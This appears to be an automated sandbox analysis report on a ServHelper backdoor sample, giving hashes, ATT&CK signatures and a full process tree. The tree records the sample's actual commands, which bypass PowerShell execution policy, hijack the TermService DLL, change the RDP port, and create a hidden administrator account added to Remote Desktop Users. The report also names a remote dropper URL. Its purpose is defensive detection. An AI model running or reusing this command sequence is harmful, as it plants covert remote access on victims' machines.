servhelper | be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c

Analysis

max time kernel
143s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
11/03/2024, 04:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bfe0ac25eeeb759f7c8e06229c7313a2.exe
Size

5.9MB
MD5

bfe0ac25eeeb759f7c8e06229c7313a2
SHA1

199c1fbd29f9ec98b83464763dac63ef80998bb3
SHA256

be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
SHA512

a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
SSDEEP

49152:tvGIuxrb/TkvO90dL3BmAFd4A64nsfJ1XU59mMJETIR1iVhYOxbJBKqKhmYYMNn9:tvGfXdmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

flow	pid	Process
64	1216	powershell.exe
69	1216	powershell.exe
72	1216	powershell.exe
74	1216	powershell.exe
78	1216	powershell.exe
80	1216	powershell.exe
82	1216	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
928	takeown.exe
1972	icacls.exe
2032	icacls.exe
1212	icacls.exe
4884	icacls.exe
4980	icacls.exe
1504	icacls.exe
3604	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
3584	Process not Found
3584	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
928	takeown.exe
1972	icacls.exe
2032	icacls.exe
1212	icacls.exe
4884	icacls.exe
4980	icacls.exe
1504	icacls.exe
3604	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023269-104.dat	upx
behavioral2/files/0x000700000002326a-105.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
63	raw.githubusercontent.com
64	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI67FC.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI689B.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_abpu3hx4.hav.ps1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI683C.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI686B.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_i3xzjwdd.01h.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI68FA.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4604	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5072	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	69	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	72	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe
1696	powershell.exe
1696	powershell.exe
1696	powershell.exe
3296	powershell.exe
3296	powershell.exe
3296	powershell.exe
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe
1216	powershell.exe
1216	powershell.exe
1216	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
668	Process not Found
668	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	4940	bfe0ac25eeeb759f7c8e06229c7313a2.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeRestorePrivilege	2032	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4604	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4604	WMIC.exe
Token: SeAuditPrivilege	4604	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4604	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4604	WMIC.exe
Token: SeAuditPrivilege	4604	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3668	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3668	WMIC.exe
Token: SeAuditPrivilege	3668	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3668	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3668	WMIC.exe
Token: SeAuditPrivilege	3668	WMIC.exe
Token: SeDebugPrivilege	1216	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 2172	4940	bfe0ac25eeeb759f7c8e06229c7313a2.exe	100
PID 4940 wrote to memory of 2172	4940	bfe0ac25eeeb759f7c8e06229c7313a2.exe	100
PID 2172 wrote to memory of 1212	2172	powershell.exe	102
PID 2172 wrote to memory of 1212	2172	powershell.exe	102
PID 1212 wrote to memory of 1972	1212	csc.exe	103
PID 1212 wrote to memory of 1972	1212	csc.exe	103
PID 2172 wrote to memory of 4492	2172	powershell.exe	105
PID 2172 wrote to memory of 4492	2172	powershell.exe	105
PID 2172 wrote to memory of 1696	2172	powershell.exe	108
PID 2172 wrote to memory of 1696	2172	powershell.exe	108
PID 2172 wrote to memory of 3296	2172	powershell.exe	110
PID 2172 wrote to memory of 3296	2172	powershell.exe	110
PID 2172 wrote to memory of 928	2172	powershell.exe	118
PID 2172 wrote to memory of 928	2172	powershell.exe	118
PID 2172 wrote to memory of 1972	2172	powershell.exe	119
PID 2172 wrote to memory of 1972	2172	powershell.exe	119
PID 2172 wrote to memory of 2032	2172	powershell.exe	120
PID 2172 wrote to memory of 2032	2172	powershell.exe	120
PID 2172 wrote to memory of 1212	2172	powershell.exe	121
PID 2172 wrote to memory of 1212	2172	powershell.exe	121
PID 2172 wrote to memory of 4884	2172	powershell.exe	122
PID 2172 wrote to memory of 4884	2172	powershell.exe	122
PID 2172 wrote to memory of 4980	2172	powershell.exe	123
PID 2172 wrote to memory of 4980	2172	powershell.exe	123
PID 2172 wrote to memory of 1504	2172	powershell.exe	124
PID 2172 wrote to memory of 1504	2172	powershell.exe	124
PID 2172 wrote to memory of 3604	2172	powershell.exe	125
PID 2172 wrote to memory of 3604	2172	powershell.exe	125
PID 2172 wrote to memory of 1496	2172	powershell.exe	127
PID 2172 wrote to memory of 1496	2172	powershell.exe	127
PID 2172 wrote to memory of 5072	2172	powershell.exe	128
PID 2172 wrote to memory of 5072	2172	powershell.exe	128
PID 2172 wrote to memory of 3732	2172	powershell.exe	129
PID 2172 wrote to memory of 3732	2172	powershell.exe	129
PID 2172 wrote to memory of 1372	2172	powershell.exe	130
PID 2172 wrote to memory of 1372	2172	powershell.exe	130
PID 1372 wrote to memory of 4216	1372	net.exe	131
PID 1372 wrote to memory of 4216	1372	net.exe	131
PID 2172 wrote to memory of 4328	2172	powershell.exe	132
PID 2172 wrote to memory of 4328	2172	powershell.exe	132
PID 4328 wrote to memory of 928	4328	cmd.exe	133
PID 4328 wrote to memory of 928	4328	cmd.exe	133
PID 928 wrote to memory of 4032	928	cmd.exe	134
PID 928 wrote to memory of 4032	928	cmd.exe	134
PID 4032 wrote to memory of 3932	4032	net.exe	135
PID 4032 wrote to memory of 3932	4032	net.exe	135
PID 2172 wrote to memory of 4804	2172	powershell.exe	136
PID 2172 wrote to memory of 4804	2172	powershell.exe	136
PID 4804 wrote to memory of 1420	4804	cmd.exe	137
PID 4804 wrote to memory of 1420	4804	cmd.exe	137
PID 1420 wrote to memory of 4884	1420	cmd.exe	138
PID 1420 wrote to memory of 4884	1420	cmd.exe	138
PID 4884 wrote to memory of 2980	4884	net.exe	139
PID 4884 wrote to memory of 2980	4884	net.exe	139
PID 3732 wrote to memory of 1596	3732	cmd.exe	143
PID 3732 wrote to memory of 1596	3732	cmd.exe	143
PID 1596 wrote to memory of 1032	1596	net.exe	144
PID 1596 wrote to memory of 1032	1596	net.exe	144
PID 3616 wrote to memory of 4328	3616	cmd.exe	147
PID 3616 wrote to memory of 4328	3616	cmd.exe	147
PID 4328 wrote to memory of 1380	4328	net.exe	148
PID 4328 wrote to memory of 1380	4328	net.exe	148
PID 3816 wrote to memory of 4800	3816	cmd.exe	151
PID 3816 wrote to memory of 4800	3816	cmd.exe	151

C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe
"C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2172
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hv4feeey\hv4feeey.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1212
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD21.tmp" "c:\Users\Admin\AppData\Local\Temp\hv4feeey\CSC7C50704A470434AAC6117201A24C01.TMP"
      4⤵
      PID:1972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3296
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:928
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1972
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1212
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4884
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4980
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1504
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3604
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:5072
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:3732
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:4216
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4328
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:928
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4032
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3932
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4804
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1420
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4884
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:4332
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3732

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3732
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1032

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc kKyHePFO /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3616
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc kKyHePFO /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc kKyHePFO /add
    3⤵
    PID:1380

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3816
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:4800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:4880

C:\Windows\System32\cmd.exe
